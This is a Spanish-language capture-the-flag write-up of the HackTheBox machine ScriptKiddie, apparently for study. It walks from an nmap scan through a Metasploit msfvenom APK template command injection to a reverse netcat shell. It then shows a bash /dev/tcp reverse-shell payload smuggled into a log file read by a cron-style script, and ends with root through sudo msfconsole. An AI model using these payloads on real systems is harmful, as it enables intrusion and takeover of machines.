ScriptKiddie es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad xxxxx.
En este caso se trata de una máquina basada en el Sistema Operativo xxxxx.
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina ScriptKiddie 10.10.10.226 a /etc/hosts como scriptkiddie.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
# Nmap 7.70 scan initiated Thu Feb 11 13:54:29 2021 as: nmap -sV -sC -p- -oA enumeration/nmap 10.10.10.226 Nmap scan report for 10.10.10.226 Host is up (0.047s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) |_http-server-header: Werkzeug/0.16.1 Python/3.8.5 |_http-title: k1d'5 h4ck3r t00l5 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Feb 11 13:55:15 2021 -- 1 IP address (1 host up) scanned in 46.01 seconds |
No vemos nada relevante más que un portal web en el puerto 5000, así que vamos a por el.
Enumeracion
Accedemos a través del navegador al puerto 5000 y encontramos la siguiente página web:
Vemos un portal web con diferentes herramientas para la ejecución de escaneos, generación de payloads, etc.
Probamos la generación de payloads y, hagamos lo que hagamos, siempre nos devuelve un enlace a un fichero .exe utilizado como plantilla:
Así que vamos a buscar en google y encontramos un exploit para metasploit para la generación de plantillas con shell inversa:
Así que nos vamos a metasploit para generar nuestro fichero de plantilla:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
msf > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection msf5 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.apk yes The APK file name Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port **DisablePayloadHandler: True (RHOST and RPORT settings will be ignored!)** Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost 10.10.14.11 lhost => 10.10.14.11 msf5 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > msf5 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit [+] msf.apk stored at /root/.msf4/local/msf.apk |
Y la cargamos en la sección de payloads, para obtener una shell en la máquina con el usuario kid en nuestra escucha:
1 2 3 4 5 6 7 |
$ nc -nvlp 4444 listening on [any] 4444 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.226] 42008 id uid=1000(kid) gid=1000(kid) groups=1000(kid) whoami kid |
Obteniendo la flag de user
Ahora que ya tenemos una shell nos vamos a la home de este usuario y tenemos la flag de user:
1 2 3 4 5 6 7 8 9 10 11 |
cd .. ls -l total 456 drwxrwxr-x 5 kid kid 4096 Feb 3 11:03 html -rw-r--r-- 1 kid kid 120525 Feb 11 12:21 linpeas.log -rwxr-xr-x 1 kid kid 325084 Feb 11 12:11 linpeas.sh drwxrwxrwx 2 kid kid 4096 Feb 3 07:40 logs drwxr-xr-x 3 kid kid 4096 Feb 3 11:48 snap -r-------- 1 kid kid 33 Feb 10 21:18 user.txt cat user.txt cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9 |
Escalado de privilegios
A continuación, y por comodidad vamos a obtener una shell con python
1 2 |
python3 -c 'import pty;pty.spawn("/bin/bash")' kid@scriptkiddie:~$ |
Revisamos los usuarios existentes y vemos que tenemos acceso a la home del usuario pwn
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
kid@scriptkiddie:/home$ cd pwn cd pwn kid@scriptkiddie:/home/pwn$ ll ll total 44 drwxr-xr-x 6 pwn pwn 4096 Feb 3 12:06 ./ drwxr-xr-x 4 root root 4096 Feb 3 07:40 ../ lrwxrwxrwx 1 root root 9 Feb 3 12:06 .bash_history -> /dev/null -rw-r--r-- 1 pwn pwn 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 pwn pwn 3771 Feb 25 2020 .bashrc drwx------ 2 pwn pwn 4096 Jan 28 17:08 .cache/ drwxrwxr-x 3 pwn pwn 4096 Jan 28 17:24 .local/ -rw-r--r-- 1 pwn pwn 807 Feb 25 2020 .profile -rw-rw-r-- 1 pwn pwn 74 Jan 28 16:22 .selected_editor drwx------ 2 pwn pwn 4096 Feb 10 16:10 .ssh/ drwxrw---- 2 pwn pwn 4096 Feb 11 11:50 recon/ -rwxrwxr-- 1 pwn pwn 250 Jan 28 17:57 scanlosers.sh* kid@scriptkiddie:/home/pwn$ |
Y un script interesante en este directorio llamado scanlosers.sh cuyo contenido es el siguiente
1 2 3 4 5 6 7 8 9 10 |
#!/bin/bash log=/home/kid/logs/hackers cd /home/pwn/ cat $log | cut -d' ' -f3- | sort -u | while read ip; do sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" & done if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi |
Revisando el mismo vamos a tratar de escalar privilegios mediante el mismo así que lanzaremos el siguiente comando sobre el fichero hackers sobre el cual escribe el anterior script
1 |
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.11/4445 0>&1' #" >> hackers |
Así que ejecutamos el mismo con el usuario kid
1 2 3 |
kid@scriptkiddie:~/logs$ echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.11/4445 0>&1' #" >> hackers <-i >& /dev/tcp/10.10.14.11/4445 0>&1' #" >> hackers kid@scriptkiddie:~/logs$ |
Y obtenemos una shell con el usuario pwn en nuestra escucha de netcat
1 2 3 4 5 6 7 8 9 |
$ nc -lvp 4445 listening on [any] 4445 ... connect to [10.10.14.11] from scriptkiddie.htb [10.10.10.226] 51950 bash: cannot set terminal process group (863): Inappropriate ioctl for device bash: no job control in this shell pwn@scriptkiddie:~$ id id uid=1001(pwn) gid=1001(pwn) groups=1001(pwn) pwn@scriptkiddie:~$ |
Así que a continuación vamos a revisar que permisos tiene el usuario
1 2 3 4 5 6 7 8 9 |
pwn@scriptkiddie:~$ sudo -l sudo -l Matching Defaults entries for pwn on scriptkiddie: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User pwn may run the following commands on scriptkiddie: (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole pwn@scriptkiddie:~$ |
Y observamos que tiene permisos de root para ejecutar msfconsole, así que vamos a por ello
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 |
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole sudo /opt/metasploit-framework-6.0.9/msfconsole .~+P``````-o+:. -o+:. .+oooyysyyssyyssyddh++os-````` ``````````````` ` +++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o ++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy --.` .-.-...-////+++++++++++++++////////~~//////++++++++++++/// `...............` `...-/////...` .::::::::::-. .::::::- .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh` -Nd` :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh` -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/ `oo/``-hd: `` .sNd :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/ .yNmMMh//+syysso-`````` -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd .shMMMMN//dmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/ `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os: /MMMMMMMMMMMMMMMMMMd. `/++-.-yy/...osydh/-+oo:-`o//...oyodh+ -hMMmssddd+:dMMmNMMh. `.-=mmk.//^^^\\.^^`:++:^^o://^^^\`:: .sMMmo. -dMd--:mN/` ||--X--|| ||--X--|| ........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//......... ================================================================================ =====================+--------------------------------+========================= =====================| Session one died of dysentery. |========================= =====================+--------------------------------+========================= ================================================================================ Press ENTER to size up the situation %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Press SPACE BAR to continue =[ metasploit v6.0.9-dev ] + -- --=[ 2069 exploits - 1122 auxiliary - 352 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: You can use help to view all available commands stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device msf6 > |
Y verificamos el usuario, siendo este root
1 2 3 4 5 6 7 8 9 10 11 |
msf6 > id stty: 'standard input': Inappropriate ioctl for device [*] exec: id uid=0(root) gid=0(root) groups=0(root) stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device msf6 > |
Obteniendo la flag de root
Así que ahora que tenemos acceso como root, simplemente obtenemos la flag desde esta consola de metasploit
1 2 3 4 5 6 7 8 9 10 11 |
msf6 > cat /root/root.txt stty: 'standard input': Inappropriate ioctl for device [*] exec: cat /root/root.txt 9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device stty: 'standard input': Inappropriate ioctl for device msf6 > |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace